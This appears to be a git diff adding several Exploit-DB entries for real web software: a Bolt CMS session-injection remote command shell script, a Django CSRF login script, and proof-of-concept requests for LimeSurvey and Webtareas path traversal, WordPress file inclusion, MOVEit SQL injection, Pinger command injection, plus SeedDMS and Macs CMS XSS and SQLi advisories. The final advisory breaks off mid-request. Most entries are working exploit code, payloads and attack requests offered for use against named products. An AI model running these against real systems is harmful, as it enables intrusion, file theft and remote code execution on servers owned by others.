+▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt new file mode 100644 index 000000000..d15f6555f --- /dev/null +++ b/exploits/php/webapps/48303.txt @@ -0,0 +1,111 @@ +# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass +# Date: 2020-04-08 +# Exploit Author: Spad Security Group +# Vendor Homepage: https://www.djangoproject.com/ +# Software Link: https://pypi.org/project/Django/ +# Version: 3.0 =< +# Tested on: windows 10 +# Language: python3.8 + +# t.me/SpadSec +# Spad Security Group + + +from requests import Session +import sys +from bs4 import BeautifulSoup +from time import sleep +from colorama import Fore, Style +from random import choice +from os import name, system + +colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] + + +def cleaner(): + if name == "nt": + system("cls") + else: + system("clear") + +def logo_printer(): + cleaner() + logo = r""" + \_______/ + `.,-'\_____/`-.,' + /`..'\ _ /`.,'\ + / /`.,' `.,'\ \ +/__/__/ \__\__\__ +\ \ \ / / / + \ \,'`._,'`./ / + \,'`./___\,'`./ + ,'`-./_____\,-'`. + / \ + """ + _logo_enumer = 0 + for char in logo: + sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") + sys.stdout.flush() + _logo_enumer +=1 + sleep(0.005) + print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") + +class DjangoCsrfMiddleWareBypass: + def __init__(self, url: str, username: str, password: str): + self.url = url + self.username = username + self.password = password + logo_printer() + self.cookies = {} + self.session = Session() + self.bypass() + + def spad_printer(self, string): + print("\n") + for char in string: + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) + + def bypass(self): + global colors + _conn = self.session.get(self.url) + self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") + for key, value in _conn.cookies.items(): + self.cookies[key] = value + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!") + + soup = BeautifulSoup(_conn.text, "lxml") + csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] + self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") + + login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) + if len(login.history) >= 2: + if login.history[1].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") + else: + self.spad_printer("[-] Error") + else: + if login.history: + if login.history[0].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") + for key, value in self.session.cookies.items(): + self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + +if __name__ == "__main__": + try: + url = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + DjangoCsrfMiddleWareBypass(url, username, password) + except IndexError: + logo_printer() + for char in f"[!] python {sys.argv[0]} http://google.com username password": + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt @@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt @@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt @@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt @@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' | grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt @@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. + + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt @@ -0,0 +1,482 @@ +# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download +# CVE: N/A + +Document Title: +=============== +Macs Framework v1.14f CMS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2206 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2206 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management +System. It focuses mainly on the +Edit In Place editing concept. It comes with a built in blog with +moderation support, user manager section, +roles manager section, SEO / SEF URL. +https://sourceforge.net/projects/macs-framework/files/latest/download + +(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple web +vulnerabilities in the official Macs Framework v1.1.4f CMS. + + +Affected Product(s): +==================== +Macrob7 +Product: Macs Framework v1.14f - Content Management System + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 & 1.2 +Multiple non-persistent cross site scripting web vulnerabilities has +been discovered in the official Mac Framework v1.1.4f Content Managament +System. +The vulnerability allows remote attackers to manipulate client-side +browser to web-applicatio requests to compromise user sesson credentials +or to +manipulate module content. + +The first vulnerability is located in the search input field of the +search module. Remote attackers are able to inject own malicious script +code as +search entry to execute the code within the results page that is loaded +shortly after the request is performed. The request method to inject is +POST +and the attack vector is located on the client-side with non-persistent +attack vector. + +The second vulnerability is located in the email input field of the +account reset function. Remote attackers are able to inject own +malicious script code as +email to reset the passwort to execute the code within performed +request. The request method to inject is POST and the attack vector is +located on the +client-side with non-persistent attack vector. + +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent external +redirects to +malicious source and non-persistent manipulation of affected or +connected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] searchString +[+] emailAdress + + +1.3 +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Mac Framework v1.1.4f Content Managament System. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The sql injection vulnerabilities are located in the `roleId` and +`userId` of the `editRole` and `deletUser` module. The request method to +inject or execute commands is GET and the attack vector is located on +the application-side. Attackers with privileged accounts to edit are +able to inject own sql queries via roleid and userid on deleteUser or +editRole. Multiple unhandled and broken sql queries are visible as default +debug to output for users as well. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a privileged web-application user account. +Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] deleteUser +[+] editRole + +Vulnerable Parameter(s): +[+] userId +[+] roleId + + +Proof of Concept (PoC): +======================= +Google Dork(s): intitle, subtitle & co. +Site Powered by Mac's PHP MVC Framework Framework of the future +Design downloaded from Zeroweb.org: Free website templates, layouts, and +tools. + + +1.1 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. +For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded 